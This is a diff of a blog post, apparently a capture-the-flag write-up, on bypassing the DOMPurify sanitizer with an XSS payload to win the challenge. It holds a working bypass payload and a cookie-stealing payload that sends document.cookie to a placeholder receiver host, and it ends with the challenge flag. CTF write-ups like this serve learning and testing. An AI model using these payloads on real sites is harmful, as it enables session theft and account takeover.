eqqn/eqqn.github.io/_posts/2019-10-10-RTFM_quals_XSS.md

 `?layout=<svg></p><style><a id="</style><iframe src=1 onmouseover=alert(1)>"> `
 With this I popped the first alert.
 DOMPurify is bypassed.
 Great, now to make it run without interaction and onto exfiltration.
 In this part you can get creative.

-To steal the cookie, you need to make a request and transfer it to a domain you control.
-A convenient web service for that is "Requestbin", which allows you to make receive requests on their servers.
+To steal the cookie, you need to make a request to a domain you control.
+A convenient web service for that is "Requestbin" [3] , which allows you to receive requests on their servers.

+`document.cookie` is where a cookie is stored.
+We append it to the end of source URL, thus making the element call our server, with the cookie as a parameter.
+We catch this request in logs.

 `?layout=<svg></p><style><a id="</style><iframe src=javascript:document.location='hxxps://REPLACE-WITH-YOUR-RECEIVER/'+ document.cookie>">`

 Once we submit the full URL into the validator, a HTTP request is made to our cookie receiver server :

 ![Image](https://eqqn.github.io/images/hobe4.jpg)

-`flag=sigsegv{pur1fy_mY_s0ul}`
+#####flag=sigsegv{pur1fy_mY_s0ul}

 This was a fun challenge, and I got to learn XSS the fun way.